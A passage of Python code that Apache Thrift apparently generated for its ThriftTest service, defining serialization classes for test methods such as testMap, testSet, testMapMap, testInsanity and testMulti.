def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testMap_args)
testMap_args.thrift_spec = (
None, # 0
(1, TType.MAP, 'thing', (TType.I32, None, TType.I32, None, False), None, ), # 1
)
class testMap_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.MAP:
self.success = {}
(_ktype273, _vtype274, _size272) = iprot.readMapBegin()
for _i276 in range(_size272):
_key277 = iprot.readI32()
_val278 = iprot.readI32()
self.success[_key277] = _val278
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testMap_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.MAP, 0)
oprot.writeMapBegin(TType.I32, TType.I32, len(self.success))
for kiter279, viter280 in self.success.items():
oprot.writeI32(kiter279)
oprot.writeI32(viter280)
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testMap_result)
testMap_result.thrift_spec = (
(0, TType.MAP, 'success', (TType.I32, None, TType.I32, None, False), None, ), # 0
)
class testStringMap_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.MAP:
self.thing = {}
(_ktype282, _vtype283, _size281) = iprot.readMapBegin()
for _i285 in range(_size281):
_key286 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_val287 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
self.thing[_key286] = _val287
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testStringMap_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.MAP, 1)
oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.thing))
for kiter288, viter289 in self.thing.items():
oprot.writeString(kiter288.encode('utf-8') if sys.version_info[0] == 2 else kiter288)
oprot.writeString(viter289.encode('utf-8') if sys.version_info[0] == 2 else viter289)
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testStringMap_args)
testStringMap_args.thrift_spec = (
None, # 0
(1, TType.MAP, 'thing', (TType.STRING, 'UTF8', TType.STRING, 'UTF8', False), None, ), # 1
)
class testStringMap_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.MAP:
self.success = {}
(_ktype291, _vtype292, _size290) = iprot.readMapBegin()
for _i294 in range(_size290):
_key295 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_val296 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
self.success[_key295] = _val296
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testStringMap_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.MAP, 0)
oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.success))
for kiter297, viter298 in self.success.items():
oprot.writeString(kiter297.encode('utf-8') if sys.version_info[0] == 2 else kiter297)
oprot.writeString(viter298.encode('utf-8') if sys.version_info[0] == 2 else viter298)
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testStringMap_result)
testStringMap_result.thrift_spec = (
(0, TType.MAP, 'success', (TType.STRING, 'UTF8', TType.STRING, 'UTF8', False), None, ), # 0
)
class testSet_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.SET:
self.thing = set()
(_etype302, _size299) = iprot.readSetBegin()
for _i303 in range(_size299):
_elem304 = iprot.readI32()
self.thing.add(_elem304)
iprot.readSetEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testSet_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.SET, 1)
oprot.writeSetBegin(TType.I32, len(self.thing))
for iter305 in self.thing:
oprot.writeI32(iter305)
oprot.writeSetEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testSet_args)
testSet_args.thrift_spec = (
None, # 0
(1, TType.SET, 'thing', (TType.I32, None, False), None, ), # 1
)
class testSet_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.SET:
self.success = set()
(_etype309, _size306) = iprot.readSetBegin()
for _i310 in range(_size306):
_elem311 = iprot.readI32()
self.success.add(_elem311)
iprot.readSetEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testSet_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.SET, 0)
oprot.writeSetBegin(TType.I32, len(self.success))
for iter312 in self.success:
oprot.writeI32(iter312)
oprot.writeSetEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testSet_result)
testSet_result.thrift_spec = (
(0, TType.SET, 'success', (TType.I32, None, False), None, ), # 0
)
class testList_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.LIST:
self.thing = []
(_etype316, _size313) = iprot.readListBegin()
for _i317 in range(_size313):
_elem318 = iprot.readI32()
self.thing.append(_elem318)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testList_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.LIST, 1)
oprot.writeListBegin(TType.I32, len(self.thing))
for iter319 in self.thing:
oprot.writeI32(iter319)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testList_args)
testList_args.thrift_spec = (
None, # 0
(1, TType.LIST, 'thing', (TType.I32, None, False), None, ), # 1
)
class testList_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype323, _size320) = iprot.readListBegin()
for _i324 in range(_size320):
_elem325 = iprot.readI32()
self.success.append(_elem325)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testList_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.I32, len(self.success))
for iter326 in self.success:
oprot.writeI32(iter326)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testList_result)
testList_result.thrift_spec = (
(0, TType.LIST, 'success', (TType.I32, None, False), None, ), # 0
)
class testEnum_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.thing = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testEnum_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.I32, 1)
oprot.writeI32(self.thing)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testEnum_args)
testEnum_args.thrift_spec = (
None, # 0
(1, TType.I32, 'thing', None, None, ), # 1
)
class testEnum_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I32:
self.success = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testEnum_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.I32, 0)
oprot.writeI32(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testEnum_result)
testEnum_result.thrift_spec = (
(0, TType.I32, 'success', None, None, ), # 0
)
class testTypedef_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.thing = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testTypedef_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.I64, 1)
oprot.writeI64(self.thing)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testTypedef_args)
testTypedef_args.thrift_spec = (
None, # 0
(1, TType.I64, 'thing', None, None, ), # 1
)
class testTypedef_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I64:
self.success = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testTypedef_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.I64, 0)
oprot.writeI64(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testTypedef_result)
testTypedef_result.thrift_spec = (
(0, TType.I64, 'success', None, None, ), # 0
)
class testMapMap_args(object):
"""
Attributes:
- hello
"""
__slots__ = (
'hello',
)
def __init__(self, hello=None,):
self.hello = hello
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.hello = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testMapMap_args')
if self.hello is not None:
oprot.writeFieldBegin('hello', TType.I32, 1)
oprot.writeI32(self.hello)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testMapMap_args)
testMapMap_args.thrift_spec = (
None, # 0
(1, TType.I32, 'hello', None, None, ), # 1
)
class testMapMap_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.MAP:
self.success = {}
(_ktype328, _vtype329, _size327) = iprot.readMapBegin()
for _i331 in range(_size327):
_key332 = iprot.readI32()
_val333 = {}
(_ktype335, _vtype336, _size334) = iprot.readMapBegin()
for _i338 in range(_size334):
_key339 = iprot.readI32()
_val340 = iprot.readI32()
_val333[_key339] = _val340
iprot.readMapEnd()
self.success[_key332] = _val333
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testMapMap_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.MAP, 0)
oprot.writeMapBegin(TType.I32, TType.MAP, len(self.success))
for kiter341, viter342 in self.success.items():
oprot.writeI32(kiter341)
oprot.writeMapBegin(TType.I32, TType.I32, len(viter342))
for kiter343, viter344 in viter342.items():
oprot.writeI32(kiter343)
oprot.writeI32(viter344)
oprot.writeMapEnd()
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testMapMap_result)
testMapMap_result.thrift_spec = (
(0, TType.MAP, 'success', (TType.I32, None, TType.MAP, (TType.I32, None, TType.I32, None, False), False), None, ), # 0
)
class testInsanity_args(object):
"""
Attributes:
- argument
"""
__slots__ = (
'argument',
)
def __init__(self, argument=None,):
self.argument = argument
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.argument = Insanity.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testInsanity_args')
if self.argument is not None:
oprot.writeFieldBegin('argument', TType.STRUCT, 1)
self.argument.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testInsanity_args)
testInsanity_args.thrift_spec = (
None, # 0
(1, TType.STRUCT, 'argument', [Insanity, None], None, ), # 1
)
class testInsanity_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.MAP:
self.success = {}
(_ktype346, _vtype347, _size345) = iprot.readMapBegin()
for _i349 in range(_size345):
_key350 = iprot.readI64()
_val351 = {}
(_ktype353, _vtype354, _size352) = iprot.readMapBegin()
for _i356 in range(_size352):
_key357 = iprot.readI32()
_val358 = Insanity.read(iprot)
_val351[_key357] = _val358
iprot.readMapEnd()
self.success[_key350] = _val351
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testInsanity_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.MAP, 0)
oprot.writeMapBegin(TType.I64, TType.MAP, len(self.success))
for kiter359, viter360 in self.success.items():
oprot.writeI64(kiter359)
oprot.writeMapBegin(TType.I32, TType.STRUCT, len(viter360))
for kiter361, viter362 in viter360.items():
oprot.writeI32(kiter361)
viter362.write(oprot)
oprot.writeMapEnd()
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testInsanity_result)
testInsanity_result.thrift_spec = (
(0, TType.MAP, 'success', (TType.I64, None, TType.MAP, (TType.I32, None, TType.STRUCT, [Insanity, None], False), False), None, ), # 0
)
class testMulti_args(object):
"""
Attributes:
- arg0
- arg1
- arg2
- arg3
- arg4
- arg5
"""
__slots__ = (
'arg0',
'arg1',
'arg2',
'arg3',
'arg4',
'arg5',
)
def __init__(self, arg0=None, arg1=None, arg2=None, arg3=None, arg4=None, arg5=None,):
self.arg0 = arg0
self.arg1 = arg1
self.arg2 = arg2
self.arg3 = arg3
self.arg4 = arg4
self.arg5 = arg5
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.BYTE:
self.arg0 = iprot.readByte()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I32:
self.arg1 = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.arg2 = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.MAP:
self.arg3 = {}
(_ktype364, _vtype365, _size363) = iprot.readMapBegin()
for _i367 in range(_size363):
_key368 = iprot.readI16()
_val369 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
self.arg3[_key368] = _val369
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I32:
self.arg4 = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.I64:
self.arg5 = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testMulti_args')
if self.arg0 is not None:
oprot.writeFieldBegin('arg0', TType.BYTE, 1)
oprot.writeByte(self.arg0)
oprot.writeFieldEnd()
if self.arg1 is not None:
oprot.writeFieldBegin('arg1', TType.I32, 2)
oprot.writeI32(self.arg1)
oprot.writeFieldEnd()
if self.arg2 is not None:
oprot.writeFieldBegin('arg2', TType.I64, 3)
oprot.writeI64(self.arg2)
oprot.writeFieldEnd()
if self.arg3 is not None:
oprot.writeFieldBegin('arg3', TType.MAP, 4)
oprot.writeMapBegin(TType.I16, TType.STRING, len(self.arg3))
for kiter370, viter371 in self.arg3.items():
oprot.writeI16(kiter370)
oprot.writeString(viter371.encode('utf-8') if sys.version_info[0] == 2 else viter371)
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.arg4 is not None:
oprot.writeFieldBegin('arg4', TType.I32, 5)
oprot.writeI32(self.arg4)
oprot.writeFieldEnd()
if self.arg5 is not None:
oprot.writeFieldBegin('arg5', TType.I64, 6)
oprot.writeI64(self.arg5)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
